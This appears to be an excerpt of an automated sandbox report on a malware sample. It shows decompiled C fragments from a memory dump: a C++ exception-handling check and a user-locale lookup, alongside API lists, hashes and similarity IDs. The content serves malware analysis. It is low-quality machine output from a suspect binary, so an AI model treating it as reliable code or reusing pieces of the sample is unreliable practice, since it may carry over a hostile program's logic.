				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E004255B3(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E004258B2(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}






                                                                                                                              0x00425b1a
                                                                                                                              0x00425b1d
                                                                                                                              0x00425b23
                                                                                                                              0x00425b31
                                                                                                                              0x00425b37
                                                                                                                              0x00425b3f
                                                                                                                              0x00425b4b
                                                                                                                              0x00425b53
                                                                                                                              0x00425b5b
                                                                                                                              0x00425b6f
                                                                                                                              0x00425b71
                                                                                                                              0x00425b75
                                                                                                                              0x00425b7a
                                                                                                                              0x00425b80
                                                                                                                              0x00425b82
                                                                                                                              0x00425b84
                                                                                                                              0x00425b87
                                                                                                                              0x00000000
                                                                                                                              0x00425b8e
                                                                                                                              0x00425b82
                                                                                                                              0x00425b75
                                                                                                                              0x00425b6f
                                                                                                                              0x00425b5b
                                                                                                                              0x00425b8f

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004255DA: __getptd.LIBCMT ref: 004255E0
                                                                                                                                • Part of subcall function 004255DA: __getptd.LIBCMT ref: 004255F0
                                                                                                                              • __getptd.LIBCMT ref: 00425B29
                                                                                                                                • Part of subcall function 0040844B: __getptd_noexit.LIBCMT ref: 0040844E
                                                                                                                                • Part of subcall function 0040844B: __amsg_exit.LIBCMT ref: 0040845B
                                                                                                                              • __getptd.LIBCMT ref: 00425B37
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                              • String ID: csm
                                                                                                                              • API String ID: 803148776-1018135373
                                                                                                                              • Opcode ID: b090dfe5f21444ebe96cc3612473875d20e543155f48515c06891e9399b454ec
                                                                                                                              • Instruction ID: 593150aa4b5220b4ff8ccdf3e03cda959e979735552baa57198d2c0989547ded
                                                                                                                              • Opcode Fuzzy Hash: b090dfe5f21444ebe96cc3612473875d20e543155f48515c06891e9399b454ec
                                                                                                                              • Instruction Fuzzy Hash: FC01A234A01B118ECF34AF65E44867EBBB5BF10324F94542FE44296391CF38E980CB49
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041ABD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 57%
                                                                                                                              			E0041ABD0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v186;
				char _v188;
				signed int _t9;
				char* _t15;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;

				_t23 = __esi;
				_t22 = __edi;
				_t17 = __ebx;
				_t9 =  *0x4301f4; // 0xe687535
				_v12 = _t9 ^ _t24;
				_v188 = 0;
				E004091C0( &_v186, 0, 0xa8);
				_t21 =  &_v188;
				_v8 =  *0x4327d0( &_v188, 0x55);
				if(_v8 != 0) {
					_t15 = E0041A160( &_v188);
				} else {
					_t15 = "Unknown";
				}
				return E00404354(_t15, _t17, _v12 ^ _t24, _t21, _t22, _t23);
			}













                                                                                                                              0x0041abd0
                                                                                                                              0x0041abd0
                                                                                                                              0x0041abd0
                                                                                                                              0x0041abd9
                                                                                                                              0x0041abe0
                                                                                                                              0x0041abe5
                                                                                                                              0x0041abfa
                                                                                                                              0x0041ac04
                                                                                                                              0x0041ac11
                                                                                                                              0x0041ac18
                                                                                                                              0x0041ac2a
                                                                                                                              0x0041ac1a
                                                                                                                              0x0041ac1a
                                                                                                                              0x0041ac1a
                                                                                                                              0x0041ac3f

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041ABFA
                                                                                                                              • GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 0041AC0B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DefaultLocaleNameUser_memset
                                                                                                                              • String ID: Unknown
                                                                                                                              • API String ID: 3917531957-1654365787
                                                                                                                              • Opcode ID: c0e0778a122c491a0a29b4d1867e73165373b5c2e662c557c9d468052331a215
                                                                                                                              • Instruction ID: b707274ab1aaa980bfbe72986140ac9d979aeec6b4f8a3832fbed5dac7fe073f
                                                                                                                              • Opcode Fuzzy Hash: c0e0778a122c491a0a29b4d1867e73165373b5c2e662c557c9d468052331a215
                                                                                                                              • Instruction Fuzzy Hash: 58F09670E0030C9BCF50EB60EC4179E7779AF14305F4084AAA509A7281EB795A98CB87
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%